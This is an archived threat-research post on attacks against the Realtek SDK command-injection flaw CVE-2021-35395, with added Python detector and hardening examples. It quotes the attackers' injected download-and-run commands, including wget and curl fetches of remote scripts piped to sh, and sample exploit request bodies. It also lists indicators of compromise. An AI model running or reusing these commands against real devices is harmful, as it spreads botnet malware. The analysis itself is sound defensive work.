{
	"id": "580beb8c-422b-4b04-806b-b469f42a55c5",
	"created_at": "2026-04-06T00:17:17.592511Z",
	"updated_at": "2026-04-10T13:11:36.927114Z",
	"deleted_at": null,
	"sha1_hash": "00266e684da869a52ffd1f00d99377411dca3c1e",
	"title": "Attacks Continue Against Realtek Vulnerabilities",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 985875,
	"plain_text": "Attacks Continue Against Realtek Vulnerabilities\r\nBy Asher Langton, Alex Burt\r\nPublished: 2021-09-02 · Archived: 2026-04-05 15:34:51 UTC\r\nAs we predicted in last week’s post, threat actors continue to use the new Realtek vulnerabilities disclosed by IoT Inspector Research Lab to distribute malware. Starting on August 19th, Juniper Threat Labs observed a new set of attacks in the wild on IoT firmware built with the Realtek SDK, this time targeting CVE-2021-35395, which was disclosed on August 16 by IoT Inspector. (Some of these attacks were previously noted in a SAM Seamless Network blog post.) These attacks are ongoing.\r\nThe Attack\r\nThe vulnerabilities in CVE-2021-35395 affect software built with the Realtek Jungle SDK (versions v2.x up to v3.4.14B) that uses the SDK-provided management interface over HTTP. Among these vulnerabilities is a command injection on the “formWsc” page caused by a failure to sanitize input. Upon receiving the peerPin parameter, the server copies the submitted value directly into a shell command string, which is then executed:\r\n\"iwpriv wlan%d-vxd set_mib pin=%s\"\r\nThe “%s” is replaced by the contents of peerPin. By adding a semicolon to terminate the iwpriv statement, it is possible to execute arbitrary commands on the device. For example, given an HTTP POST request containing “peerPin=12345;malicious_command”, the device will first execute the iwpriv command as expected, but will then also execute malicious_command.\r\nIn one set of observed attacks, starting on August 24th, the attackers sent POST requests similar to the following:\r\nFigure 1. Malicious POST request exploiting CVE-2021-35395.
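As an added illustration, not code from the Juniper post or from the Realtek SDK (which is C), the following Python model shows how the quoted format string turns a crafted peerPin into two separate shell commands, and what an allow-list check plus argv-style execution does with the same value. Only the format string comes from the post; the WPS PIN length rule, the interface index and the function names are assumptions made for the example.

```python
# Added example: a Python model of the formWsc peerPin injection and of a
# hardened handler. The Realtek SDK code is C and is not reproduced here;
# only the format string is taken from the post, the rest is illustrative.

IWPRIV_FMT = 'iwpriv wlan%d-vxd set_mib pin=%s'   # format string quoted in the post
WPS_PIN_LENGTHS = (4, 8)   # assumption for the example: WPS PINs are 4 or 8 digits


def build_vulnerable_command(iface_idx, peer_pin):
    # The vulnerable pattern: the submitted value is pasted into a command
    # string that is then handed to a shell, so shell syntax in it is honoured.
    return IWPRIV_FMT % (iface_idx, peer_pin)


def shell_command_list(cmdline):
    # Simplified model of how /bin/sh splits a command line into commands:
    # ';', '&&', '||' and newlines separate commands; quoting is not modelled
    # and a pipeline such as 'wget ... | sh' stays one command.
    for sep in ('&&', '||', chr(10)):
        cmdline = cmdline.replace(sep, ';')
    return [part.strip() for part in cmdline.split(';') if part.strip()]


def is_valid_wps_pin(value):
    # Allow-list check: decimal digits only, and only the lengths WPS uses.
    # Any metacharacter fails the digit test, so nothing needs escaping.
    return (len(value) in WPS_PIN_LENGTHS
            and all(c in '0123456789' for c in value))


def build_hardened_argv(iface_idx, peer_pin):
    # Validate first, then build an argv list for execve-style execution
    # (no shell), so even a value that slipped through could not start a
    # second command.
    if not isinstance(iface_idx, int) or iface_idx < 0:
        raise ValueError('bad interface index')
    if not is_valid_wps_pin(peer_pin):
        raise ValueError('peerPin rejected: %r' % peer_pin)
    return ['iwpriv', 'wlan%d-vxd' % iface_idx, 'set_mib', 'pin=' + peer_pin]


def demo(peer_pin):
    # Runs the same submitted value through both paths and reports what the
    # shell would execute versus whether the hardened handler accepts it.
    commands = shell_command_list(build_vulnerable_command(0, peer_pin))
    try:
        argv = build_hardened_argv(0, peer_pin)
        verdict = 'accepted'
    except ValueError as exc:
        argv, verdict = None, str(exc)
    return {'shell_commands': commands, 'argv': argv, 'verdict': verdict}


if __name__ == '__main__':
    # Value shown in the post (defanged URL) and a benign eight digit PIN.
    for pin in ('12345;wget hxxp://37[.]0.11.132/rh -O - | sh', '12345678'):
        print(demo(pin))
```

The point of the hardened path is that validation and execution are independent defences: the digit allow-list rejects the injected value outright, and the argv form means that even a value the allow-list missed would reach iwpriv as a single argument rather than a shell.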
The injected command is:\r\nwget hxxp://37[.]0.11.132/rh -O - | sh\r\nwhich downloads and executes a script named ‘rh’:\r\nFigure 2. Malicious script downloaded by the injected command.\r\nThis script is nearly identical to the one featured in last week’s post. The only change is that the parameter passed to the downloaded binary is “exploit.realtek.http” instead of “exploit.realtek”. When the botnet agent starts up, it opens a listening socket on port 44842, then opens a TCP connection to babaroga[.]lib (188[.]166.196.89, resolved specifically via the DNS server 185[.]121.177.177) on port 53 and registers the compromised device with the botnet, including an identifier — in this case, “exploit.realtek.http” — to indicate which attack was successful.\r\nWe observed another set of attacks, first noted by SAM Seamless Network, that used the same proof-of-concept exploit from the initial disclosure but with a different payload:\r\nFigure 3. Another example of a POST request exploiting CVE-2021-35395.\r\nThe injected commands in the peerPin parameter attempt to download a malicious script called lolol.sh using either wget or curl and then execute it:\r\ncd /tmp;\r\nwget hxxp://212[.]192.241.87/lolol.sh;\r\ncurl -O hxxp://212[.]192.241.87/lolol.sh;\r\nchmod 777 lolol.sh;\r\nsh lolol.sh;\r\nThe lolol.sh script starts by deleting logs and killing a large number of named processes and services, then specifically finds and kills processes using a significant amount of CPU time:\r\nFigure 4. 
lolol.sh terminating other processes on the target device.\r\nThe script then tries to download a set of malicious binaries, one for each common CPU architecture. As before, the final payload is Mirai botnet malware. Each binary is renamed to nginx (a common web server and load balancer) before the script attempts to run it. Only the binary matching the target device’s architecture will execute successfully, and that process immediately renames itself to avoid being terminated the next time lolol.sh runs. (Line 60 appears to be an error in the script.)\r\nFigure 5. lolol.sh attempting to download and execute Mirai binaries.\r\nTo ensure persistence, the script downloads the latest version of lolol.sh and sets it to run every 10 minutes as a cron job.\r\nFigure 6. lolol.sh installing itself as a cron job.\r\nFinally, the script adds firewall rules to prevent the device from being reinfected, blocking inbound connectivity to the ports to which the vulnerable server is known to bind.\r\nFigure 7. lolol.sh blocking reinfection via the Linux firewall.\r\nDetection\r\nThe malicious POST requests exploiting CVE-2021-35395 are detected by Juniper’s NGFW SRX series with IDP signature APP:MISC:REALTEK-JUNGLE-SDK-CI. The binaries and servers used in these attacks are blocked by Juniper Advanced Threat Prevention Cloud.\r\nFigure 8. Detection of malicious binaries by Juniper ATP Cloud.
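As an added example, and not Juniper’s IDP signature or any code from the post, here is a small Python detector for the exploitation pattern described above: it parses raw POST requests, flags peerPin values sent to the formWsc handler that contain shell metacharacters, extracts the hosts the injected command would fetch from, and checks them against the network indicators in the IOC list. The request path /goform/formWsc, the headers and the sample bodies are constructed for the example and only modelled on the requests in Figures 1 and 3; the post itself names only the formWsc page.

```python
# Added example: a minimal detector for CVE-2021-35395 exploitation attempts.
# Not Juniper's IDP signature and not code from the post; the request path,
# headers and sample bodies below are constructed for the demo.
from urllib.parse import parse_qs

CRLF = chr(13) + chr(10)

# Network IOCs as published in the post (defanged); refanged before matching.
IOC_HOSTS_DEFANGED = [
    '37[.]0.11.132', '212[.]192.241.72', '212[.]192.241.87',
    '103[.]113.143.232', '103[.]142.18.38', '103[.]142.18.60',
    '103[.]242.224.152', '103[.]242.224.164', '103[.]242.224.179',
    '117[.]210.156.253', '122[.]169.57.70', '185[.]222.59.10',
    '31[.]210.20.100', 'babaroga[.]lib', '185[.]121.177.177',
    '188[.]166.196.89',
]

# Characters that let a value break out of the single iwpriv command.
SHELL_METACHARS = set(';|&`$' + chr(10) + chr(13))


def refang(indicator):
    return indicator.replace('[.]', '.').replace('hxxp', 'http')


IOC_HOSTS = {refang(h) for h in IOC_HOSTS_DEFANGED}


def parse_request(raw):
    # Split a raw HTTP/1.1 request into (method, path, body); headers are
    # not needed for this check. Returns None for anything malformed.
    head, _, body = raw.partition(CRLF + CRLF)
    parts = head.split(CRLF, 1)[0].split(' ')
    if len(parts) < 2:
        return None
    return parts[0], parts[1], body


def fetched_hosts(command):
    # Hosts of every http(s) URL in the injected command, whatever tool
    # (wget, curl, ...) precedes it. Tokens are assumed space separated,
    # which holds for both payloads shown in the post.
    hosts = set()
    for token in command.replace(';', ' ').split():
        if token.startswith('http://') or token.startswith('https://'):
            hosts.add(token.split('//', 1)[1].split('/', 1)[0].split(':', 1)[0])
    return hosts


def inspect_request(raw):
    # Returns a finding dict for a POST to the formWsc handler whose peerPin
    # contains shell metacharacters, otherwise None. parse_qs percent-decodes
    # the body; the sample bodies encode ';' as %3B because Python before
    # 3.9.2 also split fields on a literal ';'.
    parsed = parse_request(raw)
    if parsed is None:
        return None
    method, path, body = parsed
    if method != 'POST' or 'formWsc' not in path:
        return None
    for pin in parse_qs(body, keep_blank_values=True).get('peerPin', []):
        if any(c in SHELL_METACHARS for c in pin):
            hosts = fetched_hosts(pin)
            return {'path': path, 'peerPin': pin,
                    'hosts': sorted(hosts), 'known_ioc': sorted(hosts & IOC_HOSTS)}
    return None


def scan(requests):
    return [f for f in (inspect_request(r) for r in requests) if f is not None]


def make_post(path, body):
    # Constructed raw request; /goform/formWsc is assumed, the post only
    # names the formWsc page.
    return CRLF.join(['POST %s HTTP/1.1' % path, 'Host: 192.0.2.1',
                      'Content-Type: application/x-www-form-urlencoded',
                      'Content-Length: %d' % len(body), '', body])


# Constructed sample traffic modelled on Figures 1 and 3, plus a benign request.
SAMPLE_REQUESTS = [
    make_post('/goform/formWsc',
              'peerPin=12345%3Bwget+http%3A%2F%2F37.0.11.132%2Frh+-O+-+%7C+sh'),
    make_post('/goform/formWsc',
              'peerPin=cd+%2Ftmp%3Bwget+http%3A%2F%2F212.192.241.87%2Flolol.sh%3B'
              'curl+-O+http%3A%2F%2F212.192.241.87%2Flolol.sh%3B'
              'chmod+777+lolol.sh%3Bsh+lolol.sh%3B'),
    make_post('/goform/formWsc', 'peerPin=12345678'),
]

if __name__ == '__main__':
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```

The metacharacter check is what makes the detector independent of any particular payload: the two campaigns in the post fetch different scripts from different hosts, but both have to break out of the iwpriv command with a semicolon, so a new download server would still be flagged, and the IOC match is only an enrichment on top of that.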
IOCs\r\n26a79029381745c4a9fce656f49d84ca058c132cc228316b359a36f6a505b057 dark.86_64\r\n0473ad0259470808a1647ab093f735d8ba2e2b38161c6cc01018505079f850db dark.arm5\r\n1a4077a5babf5eb892e573334a260d7457871ff608ee5755bee706acf14c2148 dark.arm6\r\nc481c8ae614abb2c7bf0ffd8094dabb6edc22c9146854ce1ee937ff6f9b3caf4 dark.arm7\r\nd7c66e79fe334f528efb926f4eb9494ac915a83964d11c2d5bad5407e4b483fa dark.m68k\r\n171b3c4c6bc55c1e267929962105bd77d62e647b4c7beb56d0a61c23a129d9f3 dark.mips\r\n3bd4a60d5614e77b2f0c08d27f184d698097c84368e377a4c5376f99a735dcf0 dark.mpsl\r\nc1064e2b8be2015d06d11492d25931e8739028bdb89c8f0510b04278aa1b944b dark.ppc\r\nf76d017a46373a16338dc55d1468e126850fdea5800dcf7f9800b25dd43ad84b dark.sh4\r\neb9e47d6c312374a4d00b96cc9b0df3fa5f62d5aad3c892a44c62e34e464f7a3 dark.x86\r\n9793ac5afd1be5ec55476d2c205260d1b7af6db7cc29a9dc0f7fbee68a177c78 lolol.sh\r\n0018e361be72a44b7b38bbecfede8d571418e56d4d62a8e186991bef322a0c16 b.arm5\r\n171961046ee6d18424cf466ad7e01096aecf48ed602d8725e6563ad8c61f1115 b.arm7\r\n924b6aec8aa5935e27673ee96d43dd0d1b60f044383b558e3f66cd4331f17ef4 b.mips\r\n98fc6b2cbd04362dc10a5445c00c23c2a2cb39d24d91beab3c200f87bfd889ab b.mpsl\r\n9bdb7d4778261bb34df931b41d32ee9188d0c7a7e10d4d68d56f6faebd047fe4 b.sh4\r\n2b57648fe6a75b589517cac9c515e0e6739c4aa39bfe7b3e81e2460b60edecd4 rh\r\n37[.]0.11.132\r\n212[.]192.241.72\r\n212[.]192.241.87\r\n103[.]113.143.232\r\n103[.]142.18.38\r\n103[.]142.18.60\r\n103[.]242.224.152\r\n103[.]242.224.164\r\n103[.]242.224.179\r\n117[.]210.156.253\r\n122[.]169.57.70\r\n185[.]222.59.10\r\n31[.]210.20.100\r\nbabaroga[.]lib (resolved by 185[.]121.177.177)\r\n188[.]166.196.89\r\nSource: https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities"
	],
	"report_names": [
		"attacks-continue-against-realtek-vulnerabilities"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434637,
	"ts_updated_at": 1775826696,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/00266e684da869a52ffd1f00d99377411dca3c1e.pdf",
		"text": "https://archive.orkl.eu/00266e684da869a52ffd1f00d99377411dca3c1e.txt",
		"img": "https://archive.orkl.eu/00266e684da869a52ffd1f00d99377411dca3c1e.jpg"
	}
}